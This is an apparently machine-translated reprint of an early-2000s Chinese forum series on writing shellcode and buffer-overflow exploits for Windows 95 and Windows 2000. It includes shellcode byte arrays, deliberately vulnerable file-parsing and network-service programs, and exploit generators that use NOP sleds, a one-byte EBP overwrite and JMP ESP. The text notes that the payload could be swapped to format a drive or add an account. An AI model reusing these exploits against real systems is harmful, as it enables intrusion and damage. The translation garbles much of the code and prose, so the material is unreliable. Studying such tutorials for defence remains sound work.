Creation time: 2001-06-30 Article Properties: Reprinted article Source: http://go4.163.com/watercloud/ article Submitted: Quack (QUACK_AT_XFOCUS.ORG) Post By Cloud (safesuite@263.net) recently studied The Spill of the Win platform has passed in OpenLab (61.150.43.7) VC version. Later, I've been sorted out to download the win_of.zip topic: 01 A function jump mode 02 RE a function jump method .txt 03 re RE Function jump mode. TXT 04 embedded in CC Code in C. TXT 05 Re embeds the machine code in C. TotXT 06 C. Another way to execute the machine code _ buffer overflow .txt 07 Another way to execute machine code in the C program _ buffer overflow 2 for Win2k.txt 08 WIN platform How to write a shellcode.txt 09 buffer border unchecked bug program .txt 10 Attack Previous BUG program .txt 11 overflow program description .txt 12 For the overflow program under bug_c win2k.txt 13 Windows offline one byte can also cause overflow attack .txt 14 Another overflow method JMP ESP.TXT 15 If Memcpy in bug_c is changed to STRCPY, the attack method after STRCPY. TXT 16 is changed to strcpy after the attack program for BUG_C for_win2k.txt 17 If a network server program does not check the boundary, _ _.txt 18 attacks the attack on a bug_service_c .txt 19 overflow on the Solaris for SPAC chip .txt 20 Stack of Solaris for SPAC.TXT 21 out of AppWizard and ClassWizard use mfc.txt
-------------------------------------------------- -------------------------------------------------- -
[Visual C ]: a function jump method is a function jump method
Cloud (Cloud) 2001-6-12 18:25:35 Open Laboratory (OpenLab.nwpu.edu.cn) [Visual C ] column
#include
_ASM {MOV EAX, DWORD PTR [EBP 8] Add Eax, DWORD PTR [EBP 12]}} INT TEST (INT X, INT Y) {_ASM {Pop EDI POP ESI POP EBX POP EBP PUSH OFFSET T
RET 0}
}
INT main () {Printf ("30 40 =% I / N", TEST (30, 40)); return 0;} ----------- [Visual C ]: Re: Function jump method Re: a function jump method
Cloud (Cloud) 2001-6-13 16:28:30 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column
After calling TEST, modify the stack return address for TEST TEST Returns TEST Returns to T () At this time, the stack is already the form of normal call T. The return address should be called TEST should return correctly, so In fact, T is called T and the plus is completed in T. You will return it correctly!
[In the masterpiece of Smallhill (hill):】 CAN you give a explain ok? Thanks. [In Cloud (Cloud) ----------- [Visual C ]: RE: A function jump Turning mode RE: a function jump method Cloud (Cloud) 2001-6-15 19:57:33 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column
CL / FA T.C compilation completed, everything did not have an error! Immediately, I can speak Chinese very bad, so you may have a good exchange.
TITLE tc .386Pinclude listing.incif @Version gt 510.model FLATelse_TEXT SEGMENT PARA USE32 PUBLIC 'CODE'_TEXT ENDS_DATA SEGMENT DWORD USE32 PUBLIC' DATA'_DATA ENDSCONST SEGMENT DWORD USE32 PUBLIC 'CONST'CONST ENDS_BSS SEGMENT DWORD USE32 PUBLIC' BSS'_BSS ENDS $$ Symbols Segment Byte Use32 'Debsym' $$ Symbols Ends_tls Segment DWORD USE32 PUBLIC 'TLS'_TLS Endsflat Group_Data, Const, _Bss Assume CS: Flat, DS: Flat, SS: FLatendif
IncludeLib Libcincludelib OldNames
Public_t; function compile flags: / odt_text segment_x $ = 8_y $ = 12_t proc Near; File C: / Work / ASM-C / TC; LINE 3 PUSH EBP MOV EBP, ESP; LINE 8 MOV EAX, DWORD PTR [EBP 8]; LINE 9 Add Eax, DWORD PTR [EBP 12]; Line 12 Pop EBP RET 0_T ENDP_TEXT ENDSPUBLIC _TEST; FUNCTION Compile Flags: / ODT_Text Segment_x $ = 8_y $ = 12_test Proc Near; LINE 14 PUSH EBP MOV EBP, ESP Push EBX PUSH ESI PUSH EDI; LINE 17 POP EDI; LINE 18 POP ESI; LINE 19 POP EBX; Line 20 Pop EBP; LINE 22 PUSH OFFSET FLAT: _T; Line 24 Ret 0; Line 27 Pop EDI POP ESI POP EBX POP EBP ret 0_test ENDP_TEXT ENDSPUBLIC _mainEXTRN _printf: NEAR_DATA SEGMENT $ SG52880 DB '30 40 =% i', 0aH, 00H; Function compile flags: / Odt_DATA ENDS_TEXT SEGMENT_main PROC NEAR; Line 30 push ebp mov ebp, esp; Line 31 push 40; 00000028H Push 30; 0000001EH Call _Test Add ESP, 8 Push EAX PUSH OFFSET FLAT: $ SG52880 CALL _PRINTF ADD ESP, 8; LINE 32 XOR EAX, EAX; LINE 33 POP EBP RET 0_MAIN ENDP_TEXT Endsend. [On Smallhill "masterpiece Refer to:】 please look at the Follo WING PA ...
※ Editor: Cloud at 2001-6-15 20:01:04 In [202.117.82.4] Edit this article ----------- [Visual C ]: One way to embed the machine code in C One way of embedding machine code in C
Cloud (Cloud) 2001-6-15 20:16:10 Open Laboratory (OpenLab.nwpu.edu.cn) [Visual C ] column
The following procedure compiles compilation parameters with VC6.0 CL: CL Test.c / Link kernel32.lib
The program is tested under Win95, running results: Open a resource manager brief description: The machine code is in the buffer in the program function test in the TEST through the Push Addr Buffer; Push EBP-80Ret 0 jump into the machine code
This code works as follows: String1: "shell32.dll" Call LoadLibrary
Invoke Shellexecute Null, AddR String2, 0, 0, 0, 5; String2: "Open" Opens Explorer
Push Addr EXITPROCESSRET 0; end process
#include
0xeb, 0x1e, // jmp @call 0x5d, // pop eBp @JM 0x55, // push eBP 0xFF, 0x55, 0X11, // Call DWORD PTR [EBP 11H] 0x6a, 0x05, // push 5 0x6a, 0x00 , // push 0 0x6a, 0x00, // push 0 0x6a, 0x00, // push 0 0x8b, 0xc5, // MOV EAX, EBP 0x83, 0XC0, 0X0C, // Add Eax, 0CH 0x50, // push eax 0x6a , 0x00, // push 0 0xFF, 0x55, 0x15, // Call DWORD PTR [EBP 15H] 0x68, 0x91, 0xB1, 0xF8, 0XBF, // Push 0BFF8B191H EXITPROCESS address 0xc3, // RET 0XE8, 0XD, 0xFF, 0xFF, 0xFF, // Call @jm @call 's',' h ',' e ',' L ',' L ',' 3 ',' 2 ',', 'D', 'L' , 'l', 0, 'o', 'p', 'e', 'n', 0, 0xF3, 0x75, 0xF7, 0XBF, // loadLibrary address 0x11, 0x92, 0xde, 0x7f // shellexecute address}; _asm {pop eDI POP ESI POP EBX SUB EBP, 80 PUSH EBP RET 0
}} void main () {
Hinstance hw = loadingLibrary ("user32.dll"); // farProc fp = getProcaddress (HW, "shellexecute"); // shellexecute (0, "open", 0, 0, 0, 5); // printf (" Shellexecute Addr:% P ", Shellexecute); / * Printf (" LoadLibrary Addr:% P / N ", LoadLibrary; fp = getProcaddress (HW," getProcaddress "); Printf (" getProcaddress Addr:% p / n ", FP); Printf ("GetProcaddress Addr:% P / N", getProcaddress); * / printf ("% I / N", test ());} -----------
[Visual C ]: Re: One way to embed the machine code in C: One way to embed the machine code in C
Cloud (Cloud) 2001-6-16 18:15:50 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column
Test () correctly returned code has been adjusted by me:; test (); {Push EBP MOV EBP, ESP; now EBP 4 is TEST Return Address SUB ESP, 80; buffer [80] Retaining space EBP-80 is buffer [0] address
...........
Test () Prepare to return Add ESP, 80; Fix the ESP DWORD PTR [ESP] to save the eBP value DWORD PTR [ESP 4] to return the address POP EBP; now the top of the stack is TEST RET 0; return Test MAIN function;}
And _ASM {} corresponds to assembly; _ASM; {Push EBX PUSH ESI Push EDI
POP EDI POP ESI POP EBX;
It is test () {char buffer [80]; _ASM {POP EDI; three PUSH POP ESI POP EBX SUB EBPs, 80, which is joined when entering _ASM; EBP is now buffer entry Push EBP; now the top of the stack is buffer entrance The address of the address will use this address as the return address, enter Buffer RET 0; enter the buffer, pay attention to the ESP 80 after RET is also the buffer tail ESP 84 is EBP ESP 88 is TEST; correctly return address}} in buffer There is such a part of the test () function to finally prepare the code to return, participate in Test ()
Add ESP, 80; Now the top of the stack is EBP POP EBP; now the top of the stack is Test returns the address RET 0; correctly returns to main ()
There is also 32 bits in Win32. It is already in the same linear space CS; SS; DS, etc., SS: SP CS: IP is lost, but directly in space with EIP, ESP, etc. Executive in the stack
Truely difficult Dongdong is the machine, think about the string in need, but also String's address experience is dependent on JMP and CALL, they are jumped with relative to the current address, especially CALL will save Next instruction address We put String after calling String in the top of the Call, it will be pressed into the String of String. Has embedded the String address SH_JM: POP EBP; EBP is the address of String
...........
SH_CALL: CALL SH_JM STRING DB..
It is not meaningful to compile parameters to make the program to compile
The assembler generated by the CL can be found in ftp://202.117.82.4/asm/asm-c/
Listing generated by Microsoft (R) Optimizing Compiler Version 13.00.8905
TITLE shellcode2.c .386Pinclude listing.incif @Version gt 510.model FLATelse_TEXT SEGMENT PARA USE32 PUBLIC 'CODE'_TEXT ENDS_DATA SEGMENT DWORD USE32 PUBLIC' DATA'_DATA ENDSCONST SEGMENT DWORD USE32 PUBLIC 'CONST'CONST ENDS_BSS SEGMENT DWORD USE32 PUBLIC' BSS ' _BSS Ends $$ Symbols Segment Byte Use32 'Debsym' $$ Symbols Ends_tls Segment DWORD USE32 PUBLIC 'TLS'_TLS Endsflat Group_Data, Const, _Bss Assume Cs: Flat, DS: Flat, SS: FLATENDIF
IncludeLib Libcincludelib OldNames
PUBLIC _test; Function compile flags: / Odt_TEXT SEGMENT_buffer $ = -80_test PROC NEAR; File c: /work/asm-c/shellcode2.c; Line 4 push ebp mov ebp, esp sub esp, 80; 00000050H push ebx push esi push EDI; LINE 14 MOV BYTE PTR _Buffer $ [EBP], -21; Fffffebh MOV BYTE PTR _Buffer $ [EBP 1], 36; 00000024H; line 15 MOV BYTE PTR _Buffer $ [EBP 2], 93; 0000005DH; line 16 MOV BYTE PTR _Buffer $ [EBP 3], 104; 00000068H MOV BYTE PTR _Buffer $ [EBP 4], -57; Fffffc7h MOV BYTE PTR _Buffer $ [EBP 5], -3; fffffdh MOV BYTE PTR _Buffer $ [EBP 6], 99; 00000063H MOV BYTE PTR _Buffer $ [EBP 7], 0; Line 17 MOV BYTE PTR _Buffer $ [EBP 8], -1 MOV BYTE PTR _Buffer $ [EBP 9], 85; 00000055H MOV BYTE PTR _BUFFER $ [EBP 10], 17; 00000011H; line 19 MOV BYTE PTR _Buffer $ [EBP 11], -125; ffffff83h MOV BYTE PTR _Buffer $ [EBP 12], -8; ffffff8h MOV BYTE PTR _Buffer $ [EBP 13], 0; LINE 20 MOV BYTE PTR _Buffer $ [EBP 14], 116; 00000074H MOV BYTE PTR _Buffer $ [EBP 15], 17; 00000011H; line 22 MOV BYTE PTR _Buffer $ [ EBP 16] , 106; 0000006AH MOV BYTE PTR _BUFFER $ [EBP 17], 5; Line 23 MOV BYTE PTR _Buffer $ [EBP 18], 106; 0000006ah MOV BYTE PTR _Buffer $ [EBP 19], 0; Line 24 MOV BYTE PTR _Buffer $ [EBP 20], 106; 0000006ah MOV BYTE PTR _Buffer $ [EBP 21], 0; Line 25 MOV BYTE PTR _Buffer $ [EBP 22], 106; 0000006AH MOV BYTE PTR _Buffer $ [EBP 23 ], 0; LINE 28 MOV BYTE PTR _Buffer $ [EBP 24], -125; FFFFFF83H MOV BYTE PTR _BUFFER $ [EBP 25], -59; Fffffc5h MOV BYTE PTR _Buffer $ [EBP 26], 12; 0000000CH Line 29 MOV BYTE PTR _Buffer $ [EBP 27], 85; 00000055H; Line 30 MOV BYTE PTR _Buffer $ [EBP 28], 106; 0000006AH MOV BYTE PTR _Buffer $ [EBP 29], 0;
LINE 32 MOV BYTE PTR _Buffer $ [EBP 30], -1 MOV BYTE PTR _Buffer $ [EBP 31], 85; 00000055H MOV BYTE PTR _Buffer $ [EBP 32], 9; Line 34 MOV BYTE PTR _Buffer $ [ EBP 33], -125; ffffff83h MOV BYTE PTR _Buffer $ [EBP 34], -60; FFFFFC4H MOV BYTE PTR _BUFFER $ [EBP 35], 80; 00000050H; line 35 MOV BYTE PTR _Buffer $ [EBP 36 ], 93; 0000005dh; line 36 MOV BYTE PTR _Buffer $ [EBP 37], -61; Fffffc3h; Line 37 MOV BYTE PTR _Buffer $ [EBP 38], -24; Fffffe8h MOV BYTE PTR _Buffer $ [EBP 39 ], -41; Fffffd7h MOV BYTE PTR _BUFFER $ [EBP 40], -1 MOV BYTE PTR _Buffer $ [EBP 41], -1 MOV BYTE PTR _Buffer $ [EBP 42], -1; Line 38 MOV Byte PTR _Buffer $ [EBP 43], 115; 00000073H MOV BYTE PTR _BUFFER $ [EBP 44], 104; 00000068H MOV BYTE PTR _Buffer $ [EBP 45], 101; 00000065H MOV BYTE PTR _Buffer $ [EBP 46] , 108; 0000006CH MOV BYTE PTR _BUFFER $ [EBP 47], 108; 0000006CH MOV BYTE PTR _Buffer $ [EBP 48], 51; 00000033H MOV BYTE PTR _Buffer $ [EBP 49], 50; 00000032H MOV BYTE PTR _Buffer $ [EBP 50], 46; 0000002EH MOV BYTE PTR _B Uffer $ [EBP 51], 100; 00000064H MOV BYTE PTR _Buffer $ [EBP 52], 108; 0000006CH MOV BYTE PTR _BUFFER $ [EBP 53], 108; 0000006CH MOV BYTE PTR _Buffer $ [EBP 54], 0; Line 39 MOV BYTE PTR _Buffer $ [EBP 55], 111; 0000006FH MOV BYTE PTR _Buffer $ [EBP 56], 112; 00000070h MOV BYTE PTR _Buffer $ [EBP 57], 101; 00000065H MOV BYTE PTR _Buffer $ [EBP 58], 110; 0000006EH MOV BYTE PTR _Buffer $ [EBP 59], 0; Line 40 MOV BYTE PTR _Buffer $ [EBP 60], -13; fffffff3h MOV BYTE PTR _Buffer $ [EBP 61] , 117; 00000075H MOV BYTE PTR _Buffer $ [EBP 62], -9; fffffff7h MOV BYTE PTR _Buffer $ [EBP 63], -65; fffffbfh;
Line 41 MOV BYTE PTR _Buffer $ [EBP 64], 17; 00000011H MOV BYTE PTR _BUFFER $ [EBP 65], -110; Ffffff92h MOV BYTE PTR _Buffer $ [EBP 66], -34; fffffdeh; line 42 MOV BYTE PTR _BUFFER $ [EBP 67], 127; 0000007FH XOR EAX, EAX MOV DWORD PTR _Buffer $ [EBP 68], EAX MOV DWORD PTR _Buffer $ [EBP 72], EAX MOV DWORD PTR _Buffer $ [EBP 76 ], EX; LINE 47 POP ESI; LINE 48 POP EBX; LINE 55 SUB EBP, 80; 00000050H; Line 56 Push EBP; LINE 57 RET 0; LINE 60 POP EDI POP ESI POP EBX MOV ESP, EBP pop ebp ret 0_test ENDP_TEXT ENDSPUBLIC _mainEXTRN _printf: NEAR_DATA SEGMENT $ SG53167 DB '% i', 0aH, 00H; Function compile flags: / Odt_DATA ENDS_TEXT SEGMENT_main PROC NEAR; Line 62 push ebp mov ebp, esp; Line 75 call _test push eax push Offset flat: $ SG53167 CALL _PRINTF ADD ESP, 8; Line 77 XOR EAX, EAX POP EBP RET 0_MAIN ENDP_TEXT Endsend ※ Editor: Cloud At 2001-6-16 18:47:15 In [202.117.82.4] Edit this article --- -------- [Visual C ]: Another way to execute machine code in the C program _ buffer overflow C program to execute machine code _ buffer overflow
Cloud (Cloud) 2001-6-27 11:04:29 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column
The following programs have caused the Buffer Return Address in TEST () to overwrite Test. We fill in the address near the Buffer starting in the buffer, and put a large number of NOP instructions in the front of the buffer. Test () Return Our machine code will be executed: Open an Explorer.
/ * Name: self_ex.ctestd: windows95
By Cloud 2001-6-3
* / # include
Char shellcode [92] = {0xEB, 0X38, 0X5D, 0x33, 0XC0, 0X66, 0X2B, 0XE8, 0X33, 0X2B, 0X88, 0X45, 0X0B, 0X88, 0X45, 0X10, 0X88, 0X45, 0X1B 0x55, 0xff, 0x55, 0x11, 0x33, 0x74, 0x14, 0x6a, 0x05, 0x53, 0x53, 0x55, 0x19, 0x50, 0x83, 0x19, 0x50, 0x83, 0xc5, 0x0c, 0x55, 0x33 0x55, 0x53, 0x68, 0x91, 0xB1, 0xF8, 0xBF, 0xC3, 0xE8, 0XC3, 0xFF, 0xFF, 0xFF, 's',' h ',' E ',' L ',' L ',' 3 ',' 2 ','. ',' D ',' L ',' L ',' 0 ',' O ',' P ',' E ',' N ',' 0 ' 0xF3, 0x75, 0x92, 0xBF, 0x11, 0x92, 0XDE, 0x7F, 'c', ':', '0', '/ 0'}; char buff [500]; char Message [100]; int 1; Unsigned long * lp; unsigned char * cp; unsigned long addr; dword getsp () {__ASM MOV EAX, ESP} void test () {charffer [256]; memory (buffer, buff, sizeof);} int Apientry Winmain (Hinstance Hinstance, Hinstance Hprevinstance, LPSTR LPCMDLINE, INT NCMDSHOW) {
Addr = getsp (); addr = addr - 200; cp = (unsigned char *) BUFF; for (i = 0; i <256 - 92; i , cp ) {* cp = 0x90;} for (i = 0; i <92; i , CP ) {* cp = shellcode [i];} lp = (unsigned long *) cp; for (i = 0; i <40; i , lp ) {* lp = addr;}
Test (); MessageBox (Null, "Winmain End, Return!", "Winmain", MB_OK; RETURN 0;} --------- [Visual C ]: C program Another way _ buffer overflow 2 for Win2KC program to execute machine code _ buffer overflow 2 for Win2k
Cloud (Cloud) 2001-6-27 11:10:40 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column
The following procedure is the same as the expected value, the machine code is executed. Machine code execution results: pop-up Message dialog box display: from binnar code. Then call EXITPROCESS ()
/ * Name: self_ex_win2k.ctest: Win2k Pro Sp1 by Cloud 2001-6-12 * / # include } Int apientry Winmain (Hinstance Hinstance, LPSTANCETANCE, INT NCMDSHOW) {Test (); MessageBox (Null, "Winmain End, Return!", "Winmain", MB_OK; Return 0;} ----- ------ [Visual C ]: How to write Shellcode on the Win platform How to write shellcode on the shellcode platform Cloud (Cloud) 2001-6-27 19:59:39 Open Laboratory (OpenLab.nwpu.edu.cn) [Visual C ] column The writing of shellcode on UNIX has already spent a lot of articles on Windows. However, before writing, we have to know how the address we have to call is how to get the address ?? is very simple #include Compile CL Addr.c / Link User32.lib Run! What did you see ?? Fast record !! for Win2k Pro SP1; // loadLibrarya 77e67273 for Win95 0BFF775F3H; // MessageBoxa 77E0737E for Win95 0BFF638D9H; // EXITPROCESS 77E6F32D for Win95 0BFF8B191H What is the address? Take a look at the following compilation !! But you can't remember that there are no special characters such as / 0 / n in the last machine code, so you have to make a lot of Dongdong to modify / 0 in USER32.DLL / 0 / 0 No, it is used in '0' and then a 0 in the assembly !! JMP cajm: POP EBP; get the start address XOR EAX, EAX; the following three lines are for SUB ESP, 1000 but direct SUB ESP, 1000, there are two / 0 no way to change to 3 lines MOV AX, 1000 Think about why -1000; when you see this code execution, the ESP is at its top, there are not a few Push Sub ESP, EAX; if you cover yourself? Of course, to -1000 XOR EBX, EBX; The following 4 lines are for MOV BYTE PTR [EBP EBX], Al can't change the MOV BL, 12; becomes now this DEC EBX DEC EBX XOR EAX, EAX; The following 4 lines are gave the character jail / 0 MOV BYTE PTR [EBP EBX], Al Mov Byte PTR [EBP 18], Al Mov Byte Ptr [EBP 36], Al Push 0BFF775F3H; loadingLibrarya Push EBP; LOADLIBRAYA parameters point to "User32.dll" CALL DWORD PTR [ESP 4]; call LoadLibraryAxor EBX, EBX PUSH EBX; MB_OK MOV EAX, EBP ADD EAX, 11; Message Title Push Eax Add Eax, 8 Push EAX; ". From Binnar Code" push ebx; NULL push 0bff8b191h; ExitProcess return by MessageBoxA push 0BFF638D9h; MessageBoxA ret 0; return to look MessageBoxA MessageBoxA and returned to the ExitProcessca: call jm db "user32.dll", '0'; 10 1 DB "Message", '0'; 7 1 DB "from binnar code.", '0'; 17 1 Put it in the compilation and compile DUMPBIN / DISASM ??. EXE> A.TXT Opens A.txt with Notepad to see what we want to get the machine code: pop up the dialog box display information, then exit the process, you can get the following machine code. Char shellcode [108] = {0xEb, 0x3d, 0x5d, 0x333, 0xc0, 0x66, 0x2b, 0xe8, 0x33, 0x2b, 0x, 0x33, 0x4b, 0x4b, 0x33, 0xc0, 0x88, 0x04, 0x2b , 0x88, 0x45, 0x12, 0x88, 0x45, 0x24, 0x68, 0xf3, 0x75, 0xf7, 0x54, 0x24, 0x04, 0x33, 0x2, 0x53, 0x8b, 0xc5, 0x83, 0xc0, 0x0b, 0x50 0x83, 0xc0, 0x08, 0x50, 0x53, 0x68, 0x91, 0x68, 0xF8, 0x38, 0xF6, 0xBF, 0xC3, 0xE8, 0xBe, 0xFF, 0xFF, 0xFF, 'u', 's' , 'e', 'r', '3', '2', '.', 'D', 'L', 'L', '0', 'M', 'E', 'S', ' S ',' A ',' G ',' E ',' 0 ',' F ',' R ',' O ',' M ', 20,' B ',' I ',' N ',' N ',' A ',' R ', 20,' C ',' O ',' D ',' E ',', ',' 0 ',' N ',' N ',' N '}; The last three 'n' is filled, because the allocation space is 4 years old, so our Code is also a more than 4 years of good writing overflow programs. Editor: Cloud at 2001-6-27 20:04:14 In [202.117.82.4] Edit this article ----------- [Visual C ]: buffer boundary unchecked bug program buffer boundary Check the BUG program Cloud (Cloud) 2001-6-27 11:21:20 Open Laboratory (OpenLab.nwpu.edu.cn) [Visual C ] column When the program is not good at checking the length of the buffer, it is often used to use Strcpy and other functions. There is no check of the buffer length. This gives us a machine. The following programs have been made by the text file processing __ student grades defaults are one information for each line: Name: Learn: Language score: Mathematics score:... / N In main (), the entire file or the first 500 bytes Adding test () Test () Test () Test () is intended to handle a row of student information. When the open file is the normal data file, everything is normal, but I think we carefully make a file with the data file after deleting the file. How is the celebration ^ _ & / * Name: bug.c by cloud 2001-6-4 * / #include } int Apientry Winmain (Hinstance Hinstance, LPSTANCE HPREVINSTANCE, LPSTANCE HPCMDLINE, INT NCMDSHOW) {file * f = fopen ("DataFile.dat", "RB"); long Len; if (f == null) {MessageBox (0, "Open file failed!", "WinMain bug", MB_OK; return -1;} fseek (f, 0, seek_ek_ek); len = ftell (f); fseek (f, 0, seek_set); if (len> Sizeof (file_buffer)) LEN = SizeOf; IF (Fread (file_buffer, 1, len, f)! = len) {MessageBox (0, "reading file failed!", "WinMain bug", MB_OK; fclose (f Return-2;} fclose (f); Test (); MessageBox (NULL, "Winmain End, Return!", "Winmain", MB_OK; Return 0;} ----------- [Visual C ]: Attack a bug program attack A BUG program Cloud (Cloud) 2001-6-27 11:28:08 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column We carefully produce a data file by following the following procedures to make our machine code to be executed, the execution result is: Open an Exit Administrator, then call the EXITPROCESS () program Basic point: Each program is executed to Main () The start address of the fake area is the same, thereby guess the other party buffer address, then use this address override to return the address, because it may be inaccurate, so the large number of NOP instructions are placed at the beginning of the buffer, and we can guarantee us as long as we reach the NOP area. The machine code is executed. Use this program to generate a data file before running, then copy the data file into the bug.exe directory, and then execute bug.exe to see the resource manager. Compile parameters: bug.c ex_bug.c cl file_name.c / link user32.lib / * Name: ex_bug.ctested: windows95 by cloud 2001-6-4 * / # include Cloud (Cloud) 2001-6-27 11:32:58 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] The stack is as follows. High address ----> low address [RET] [EBP] [buffer] return: function return address back After overflowing [RET] [EBP] [(binnar_code) (NOP NOP NOP .....)] | | --------------------------- ------------ [Visual C ]: Overflow programs under bug.c win2k for overflow programs under bug.c Win2k Cloud (Cloud) 2001-6-28 18:44:36 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column / * Bug.c * / # include File * f = fopen ("DataFile2.dat", "RB"); long Len; if (f == null) {MessageBox (0, "Open Failed!", "WinMain Bug", MB_OK; Return -1 } Fseek (f, 0, seek_end); len = fTell (f); fseek (f, 0, seek_set); if (len> sizeof) len = sizeof (file_buffer); if (Fread (File_Buffer, 1 , LEN, F)! = LEN) {MessageBox (0, "Reading File Failed!", "Winmain bug", MB_OK; fclose (f); return -2;} fclose (f); Test (); MessageBox (NULL, "Winmain End, Return!", "Winmain", MB_OK; Return 0; Overflow attack program for Win2k / * name: ex2.ctested: win2k pro sp1 by cloud * / # include File * f = fopen ("DataFile2.dat", "WB"); if (f == null) {MessageBox (0, "Open Failed!", "Winmain EX", MB_OK; Return -1;} AddR = getSP (); addr = addr - 200; cp = (unsigned char *) BUFF; for (i = 0; i <256 - sizeof (shellcode); i , cp ) {* cp = 0x90;} for i = 0; I The following Test () function has a problem, but we can't overwrite the RET can only cover the EBP low byte, what can we do?? CHAR BUFF [1024]; INT I; Void Test () {Char Buffer [128]; / *....................... * / for (i = 0; i <129; buffer [I] = BUFF [i ]); / *................. * / } void main () {/ *......................... We look at what MAIN and TEST calls: Test; {Push EBPMOV EBP, ESPSUB ESP, 128; Reserved Space for Buffer ..... MOV ESP, EBPPOP EBPRET; Also as above: See if we rewrite the low of EBP, EBP will return to the ESP in Main. If the EBP can point to the low position of the shellcode address, the main function returns to the return of our address. Returns in main ESP = EBPPOP address Returns the address of the POP | Shellcode Address | ----> | EBP ----> | ?? | | | | | Then our shellcode will be executed when the main function returns. Now look at how the Test is overwriting the EBP low position, EBP also points to the stack. When the mA in in the TEST is not more than 255 bytes, it is 3 digits, only the low level can point to buffer, such as the buffer address is 0x00463000 So after the coverage -------------------------------------------- -------------> EBP | RET | 0x00463000 128 - 8 | 0x00463000 | ?? | shellcode | LEN: 4 4 4 4 120 MAIN returns MOV ESP, EBP; ^ | ESP POP EBP; ^ | ESP RET 0; OK Our machine code is executed !!!! Demonstration: / * Name: ex_byte.ctested: windows95 by cloud 2001-6-5 * / # include For (i = 0; i <252 - sizeof (shellcode); i , cp ) {* cp = 0x90;} for (i = 0; i Int apientry Winmain (Hinstance Hinstance, LPSTANCETANCE, INT NCMDSHOW) {Test ();} ----------- [Visual C ]: Another overflow method JMP ESP Another overflow Way JMP ESP Cloud (Cloud) 2001-6-27 11:50:20 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] The overflow above the column is done by guessing the buffer address range (of course, you can also write procedures) Guess) The procedures you write are of course the address is easy to determine, but if you attack someone else's procedures, you will not be able to guess a lot of this, the traditional program guess the address with the Buffer length, the data definition in TEST () is related, Call the test () function is related........................, You can use Soft_ICE tracking to test () record stack. We can use another way to deliver our machine code after using only the speculation of the Buffer length! In the operating system core such as kernell32.dll, there is a JMPL ESP instruction. If there is such an instruction at the 0xC1049A17 address in Win95 !!! Open Soft_ICE to find a lot! So if you know the buffer length buff_len, then we are covered with 0xc1049a17ret in the buff_len 8, then put our binnar code in the upper part, then Test () returns the machine code will be executed at this time, just know the buffer length. can Stack overwriting ----------------------> |???? | RET | EBP | BUFFER | Overlaid Binnar Code | 0xC1049A17 | 0xC1049A1 | 0XC1049A1.............. | | -------------> JMP ESP ^ | ESP Test () returns to 0xC1049A1 to execute JMPL ESP, at this time, ESP points to our Binnar Code The following procedure is a demo compilation parameter CL EX_JESP.C / LINK USER32.LIB SHELLCODE partial machine code is: pop up a message window display from binnar code. AdjustProcess () / * Name: ex_jesp.ctested: windows95 by Cloud 2001-6-5 * / # include For (i = 0; i Cloud (Cloud) 2001-6-28 18:51:30 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column Simply look Memcpy (line_buffer, file_buffer, sizeof (file_buffer)) After the attack program is the same! But our file_buffer is: [addr] [shell code] [NOP] where shellcode, NOP part Do not include / 0 but look at Addr, because the stack address starts with 00, that is, the high level of the addR four bytes will make Strcpy to the first address of the first address is not copied, so that we cannot Cover the return address of Test (), the solution at this time is that the specific operation of the JMP ESP method mentioned earlier is not much! Editor: Cloud on 2001-6-28 20:12:49 In [202.117.82.4] Edit this article ----------- [Visual C ]: Change to strcpy attack procedure for bug.c Change to strcpy attack procedure for bug.c Cloud (Cloud) 2001-6-28 20:15:16 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column The following is an attack program to use JMP ESP method: CL /EX2.C / LINK USER32.LIB / * Name: ex2.ctested: win2k pro sp1 by cloud 2001-6-28 * / # include File * f = fopen ("DataFile2.dat", "WB"); if (f == null) {MessageBox (0, "Open Failed!", "Winmain EX", MB_OK; Return-1;} AddR = 0x77E6898B; // Addr of jmp ESP LP = (unsigned long *) BUFF; for (i = 0; i <(buffer_len 8) / 4; i , lp ) * lp = addr; cp = (unsigned char *) lp; for (i = 0; i <32; i , cp ) * cp = 0x90; For (i = 0; I For example, the following procedures are compiled: CL bug_service.c / link user32.lib kernel32.lib WS2_32.Lib After running, there is no interface running in the background, you can use the task manager to see In DidRead (), we can run our machine code when the same method !!! Of course, this machine code is determined by you: format the C drive? Add an account?. . / * Named: bug_service.ctested: win2k process: win2k pro sp1 by cloud 2001-6-28 * / # include WVersionRequested = MakeWord (2, 2); Err = WSAStartup (WVersionRequested, & WSADATA); if (Err! = 0) {Err_DUMP ("WS2_32.dll not find! / n"); return -1;} if (LobyTe .wversion)! = 2 || Hibyte (wsadata.wversion)! = 2) {wsacleanup (); err_dump ("Little Than 2.2! / n"); return -2;} IF ((SOCKFD = Socket (AF_INET, SOCK_STREAM, 0) <0) Err_Dump ("Serber: Can't Open Stream Socket / N); serv_addr.sin_family = Af_Inet; Serv_addr.sin_addr.s_addr = HTONL (INADDR_Any); Serv_addr.sin_port = htons (5000); if (Bind (Sockfd, SockAddr *) & serv_addr, sizeof (serv_addr)) <0) Err_Dump ("Server: can't Bind Local Address / N"); Listen (Sockfd, 5); for (;;) {clilen = sizeof (cli_addr); newsockfd = accept (sockfd, (struct sockaddr *) & cli_addr, & clilen); if (newsockfd == INVALID_SOCKET) err_dump ( "server: accept error / n") MessageBoxa (0, "Accepted!", "", 0); // Write (newsockfd, "hello! / N", 7); buffer [0] = '4'; if (Recv (Newsockfd, Buffer, 512 , 0) == SOCKET_ERROR) {Err = wsagetlasterror (); Sprintf (buffer, "Recv err:% I", err); MessageBoxa (0, buffer, ", 0);} if (buffer [0] == 'X') Break; Didread (Buffer); Close (Newsockfd); MessageBoxa (0, "Main Return!", "", 0); wsacleanup (); return 0;} ----------- [Visual C ]: attack on a bug_service.c attack program attack The attack program of the last bug_service.c Cloud (Cloud) 2001-6-28 22:05:30 Open Laboratory (OpenLab.nwpu.edu.cn) [Visual C ] column The following is the SHELLCODE block robot code we send to the server to the server to attack the execution result is to pop up a message basket from binnar Code. Of course, you can also change to add an account, format the hard disk, etc. (but I don't recommend everyone to do bad things!) This can be seen that a bad happens when the 